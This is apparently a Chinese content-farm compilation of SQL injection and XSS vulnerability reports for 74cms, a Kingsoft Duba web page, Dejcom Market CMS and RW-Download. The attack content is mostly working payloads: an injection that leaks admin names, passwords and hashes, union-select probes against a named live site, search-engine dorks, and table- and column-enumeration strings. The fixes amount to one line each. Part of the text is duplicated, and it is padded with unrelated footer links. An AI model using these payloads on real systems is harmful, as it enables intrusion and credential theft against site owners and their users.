以下是小编为大家准备的Dejcom Market CMS (showbrand.aspx) SQL 注入及修复(共含5篇),欢迎大家前来参阅。同时,但愿您也能像本文投稿人“緈t諨約錠”一样,积极向本站投稿分享好文章。
74cms sql注入漏洞
function getip
{
if(getenv('HTTP_CLIENT_IP')){
$onlineip=getenv('HTTP_CLIENT_IP');
}else if(getenv('HTTP_X_FORWARDED_FOR')){
$onlineip=getenv('HTTP_X_FORWARDED_FOR');
}else if(getenv('REMOTE_ADDR')){
$onlineip=getenv('REMOTE_ADDR');
}else{
$onlineip=$_SERVER['REMOTE_ADDR'];
}
return $onlineip;
}
ip没过滤
我们可以这样注入
$getinj=“zyday1.1.', email=(SELECT concat(admin_name,0x2f,pwd,0x2f,pwd_hash ) FROM qs_admin) where username = '$dpusername'#”;
就是把查询到的账号密码赋值给email...接着在会员中心查看个人资料就可以爆账号和密码和hash了
修复:过滤下就行了
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
留言处输入:
修复方案:严格过滤
金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下,
第一个
简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限
详细说明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1
labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2
结果明显不同 注入漏洞产生
修复方案:过滤变量app
第二个
简要描述:过滤不严导致存在SQL注入
详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version,4,5,user(),database(),8,9--
labs.duba.net/robots.txt
未作进一步测试
修复方案:过滤参数
第三个:
简要描述:留言处过滤不严 造成跨站漏洞
详细说明:留言处过滤不严 造成跨站漏洞
漏洞证明:labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5
发布作者:Mormoroth
影响版本:ALL Version
漏洞类型:SQL注入
漏洞描述:Dejcom Market CMS showbrand.aspx页面参数未经过严格过滤,导致SQL注入漏洞产生,
Dork : “Powered By Dejcom Market CMS”
Exploit:
%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge','COMMENTS','filegroup','files','groups','khabarname','khat','links','login'))--
showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name='loguser' and column_name not in('code','username','pass'))--
Demo : www.myhack58.com/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--
www.hack50.com修复方案:
showbrand.aspx页面参数严格过滤
RW-Download是一款支持模板及多语言版本的上传下载系统,RW-Download 4.0.6版的index.php存在sql注入漏洞,可能导致敏感信息泄露。
[+]info:
~~~~~~~~~
//*Title ||=>RW-Download v4.0.6 => (index.php) SQL Injection Vulnerability
//*Secript ||=>RW-Download
//*Language||=>Php
//*Download||=>traidnt.net/vb/attachment.php?attachmentid=72765&d=1157806602
//*Date ||=>2011-01-30
//*version ||=>4.0.6
//*D0rk ||=>“Powered by RW-Download v4.0.6”
//*info ||=>By Dr.Net , Abdullah hacker team , || My Email : xdr.netx@Gmail.com
[+]poc:
~~~~~~~~~
// |=>localhost/index.php?dlid=1 <== { SQL Injection }
//*Admin Page
// |=>localhost/admin.php
[+]Reference:
~~~~~~~~~
www.exploit-db.com/exploits/16080
修复:
无他,唯过滤尔
★ 口腔修复实习心得
★ 钢笔修复记作文